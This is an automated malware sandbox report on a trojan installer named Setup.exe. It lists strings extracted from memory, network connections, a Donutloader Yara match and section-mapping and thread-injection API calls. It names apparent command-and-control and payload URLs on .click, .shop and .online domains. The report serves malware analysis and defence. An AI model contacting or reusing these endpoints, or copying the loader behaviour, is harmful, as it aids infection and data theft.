              Source: Setup.exe, 00000000.00000003.1890502040.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/
              Source: Setup.exe, 00000000.00000003.1856495243.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/#
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/C
              Source: Setup.exe, 00000000.00000002.1974831095.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1857704408.000000000069C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1856495243.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/api
              Source: Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/api:
              Source: Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/apiFil
              Source: Setup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1856495243.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/apig
              Source: Setup.exe, 00000000.00000003.1856495243.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/k
              Source: Setup.exe, 00000000.00000003.1842376944.00000000006EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click/u
              Source: Setup.exe, 00000000.00000003.1856495243.00000000006AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://abberanteusz.click:443/api
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005311000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBkq
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1974727785.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt8Q
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1974727785.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/HQ
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA05
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.securetrust.com/CA0:
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
              Source: powershell.exe, 00000002.00000002.1920721795.00000000032C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1922557688.0000000005B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org/
              Source: Setup.exe, 00000000.00000003.1914615254.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1914700847.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000000.1971208181.0000000000841000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://jrsoftware.org0
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1972142744.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtPE
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtR3SF
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1963580179.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtot
              Source: powershell.exe, 00000002.00000002.1928225704.000000000637B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: Setup.exe, 00000000.00000003.1972142744.000000000069E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.trustwave.com/CA03
              Source: Setup.exe, 00000000.00000003.1800048845.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Setup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Setup.exe, 00000000.00000003.1811874212.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800281285.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811481064.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1811650599.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800162410.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1800048845.0000000003562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Setup.exe, 00000000.00000003.1800162410.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.1994375751.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000003.2003272103.0000000002AD0000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000003.2483412131.0000000002860000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.drString found in binary or memory: https://www.certum.pl/CPS0
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Setup.exe, 00000000.00000003.1799240014.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1799405459.0000000003509000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1798169866.000000000350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drString found in binary or memory: https://www.innosetup.com/
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Setup.exe, 00000000.00000003.1831025961.00000000035EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1975272880.00000000032EF000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.exe, 00000006.00000003.1980668729.000000007EFCB000.00000004.00001000.00020000.00000000.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000007.00000000.1984948438.00000000009E1000.00000020.00000001.01000000.00000009.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp, 00000009.00000000.2007747384.0000000000A7D000.00000020.00000001.01000000.0000000C.sdmp, WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drString found in binary or memory: https://www.remobjects.com/ps
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.198.102:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49745 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Sample or dropped binary is a compiled AutoHotkey binary
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02070369 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_02070369
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020703690_2_02070369
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020203A90_2_020203A9
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202A2060_2_0202A206
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020492170_2_02049217
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020622460_2_02062246
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0204BA760_2_0204BA76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203BAB60_2_0203BAB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020402E60_2_020402E6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203E2FD0_2_0203E2FD
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202F30E0_2_0202F30E
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02025B160_2_02025B16
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202AB260_2_0202AB26
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202C3760_2_0202C376
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02048BB60_2_02048BB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203FBC60_2_0203FBC6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02028BE60_2_02028BE6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203A3FD0_2_0203A3FD
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202A8360_2_0202A836
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020448960_2_02044896
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020628A60_2_020628A6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020318CC0_2_020318CC
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020480F60_2_020480F6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203F8F60_2_0203F8F6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020271160_2_02027116
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0204A9280_2_0204A928
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205A9460_2_0205A946
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020251660_2_02025166
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020379720_2_02037972
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020279760_2_02027976
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0204517D0_2_0204517D
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205B1D60_2_0205B1D6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02027E060_2_02027E06
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205AE260_2_0205AE26
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02030E4A0_2_02030E4A
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203E6520_2_0203E652
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02033EC60_2_02033EC6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020326DA0_2_020326DA
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0202E7420_2_0202E742
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020417660_2_02041766
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203A7720_2_0203A772
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02061FB60_2_02061FB6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203FFD60_2_0203FFD6
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203340C0_2_0203340C
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02043C460_2_02043C46
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0204AC6B0_2_0204AC6B
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205BC760_2_0205BC76
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020625460_2_02062546
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0203ED450_2_0203ED45
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020305480_2_02030548
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020405560_2_02040556
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0205ED660_2_0205ED66
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_020455730_2_02045573
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02029D960_2_02029D96
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0204B5B50_2_0204B5B5
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-1RSR3.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
              Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 02029726 appears 66 times
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.8.drStatic PE information: Number of sections : 11 > 10
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.exe.0.drStatic PE information: Number of sections : 11 > 10
              Source: WPNMSIA79IRF0S6IHRZ7TIDHI.tmp.6.drStatic PE information: Number of sections : 11 > 10
              Source: Setup.exe, 00000000.00000000.1654892296.0000000000520000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1770590161.0000000002BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1918294465.0000000003B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Setup.exe
              Source: Setup.exe, 00000000.00000003.1918368822.00000000039DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Setup.exe
              Source: Setup.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup.exe
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_02020AB9 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02020AB9
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
